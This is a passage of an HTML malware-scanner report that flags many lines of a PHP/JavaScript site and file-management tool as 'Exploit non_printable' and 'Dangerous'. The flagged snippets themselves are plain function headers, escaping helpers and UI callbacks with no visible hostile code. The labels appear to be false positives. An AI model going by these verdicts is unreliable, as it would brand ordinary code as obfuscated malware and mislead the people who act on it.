</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmNewFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2892</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeNewFileModal</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCreateFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2933</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmImportArchive</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmUploadArchive</span><span style="color: #007700">(</span><span style="color: #0000BB">file</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 293</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent </span><span style="color: #007700">= </span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2989</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3021</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3028</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyPath</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">el</span><span style="color: #007700">.</span><span style="color: #0000BB">style</span><span style="color: #007700">.</span><span style="color: #0000BB">color</span><span style="color: #007700">=</span><span style="color: #0000BB">old</span><span style="color: #007700">; },</span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3034</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3038</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmFmtSize</span><span style="color: #007700">(</span><span style="color: #0000BB">bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bytes</span><span style="color: #007700">+</span><span style="color: #DD0000">' B'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3044</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1024</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' KB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1048576</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' MB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3047</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escJs</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/\\/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'\\\\'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">'/g,"\\'"); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escHtml</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/&/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&amp;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&lt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/>/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&gt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">"/g,'&quot;'); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3071</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">viewFile</span><span style="color: #007700">(</span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">siteRoot</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'view-modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">copyFileContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_storage_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋 Копировать'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openModal</span><span style="color: #007700">(</span><span style="color: #0000BB">username</span><span style="color: #007700">, </span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">hashId</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw2</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password2'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">savePassword</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$out</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_states</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 318</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_states</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_STORAGE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$written </span><span style="color: #007700">!== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_touch_entry</span><span style="color: #007700">(&</span><span style="color: #0000BB">$states</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_saved_state</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$states</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 368</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_allowed</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 379</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ok'</span><span style="color: #007700">, </span><span style="color: #DD0000">'off'</span><span style="color: #007700">, </span><span style="color: #DD0000">'unknown'</span><span style="color: #007700">), </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_storage_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
